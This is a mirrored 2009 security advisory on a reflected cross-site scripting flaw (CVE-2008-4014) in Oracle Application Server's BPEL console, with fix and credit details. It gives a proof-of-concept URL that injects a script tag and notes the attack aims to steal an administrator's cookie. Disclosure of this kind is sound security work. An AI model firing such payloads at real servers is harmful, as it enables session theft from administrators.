Lucene search
Sh2kerrPACKETSTORM:73877HistoryJan 15, 2009 - 12:00 a.m.
Oracle Application Server Cross Site Scripting
2009-01-1500:00:00
Sh2kerr
packetstormsecurity.com
70
0.006 Low
EPSS
Percentile
76.5%
`
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001
Application: Oracle Application Server (SOA)
Versions Affected: Oracle Application Server (SOA) version 10.1.3.1.0
Vendor URL: http://www.oracle.com
Bugs: XSS
Exploits: YES
Reported: 10.01.2008
Vendor response: 11.01.2008
Date of Public Advisory: 13.01.2009
CVE: CVE-2008-4014
Description: XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP
Author: Alexandr Polyakov
Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Linked XSS vulnerability found in BPEL module of Oracle Application Server (Oracle SOA Suite).
Details
*******
Linked XSS vulnerability found in BPEL module. In page BPELConsole/default/activities.jsp attacker can inject XSS by appending it to URL
Example
*******
http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG
Attacker must send injected link to administrator and get adminiatrators cookie.
Code with injected XSS:
----------------------------------------------------------------
</th>
<th id="activityLabel" class="ListHeader" align="left" nowrap>
<a href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class=HeaderLink>
Activity Label
</a>
</th>
---------------------------------------------------------------------------
Fix Information
***************
Information was published in CPU January 2009.
All customers can download CPU petches following instructions from:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in CPU January 2009.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru
`
Related
checkpoint_advisories
checkpoint_advisories
erpscan
erpscan
Oracle Application Server (SOA) — Linked XSS vulnerability
2008-10-01 00:00:00
cve
cve
CVE-2008-4014
2009-01-14 02:30:00
prion
prion
Buffer overflow
2009-01-14 02:30:00
securityvulns
securityvulns
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001
2009-01-16 00:00:00
Oracle applications multiple security vulnerabilities
2009-12-15 00:00:00
oracle
oracle
CPU Jan 2009
2009-01-13 00:00:00
nessus
nessus
Oracle Application Server Multiple Vulnerabilities
2012-01-24 00:00:00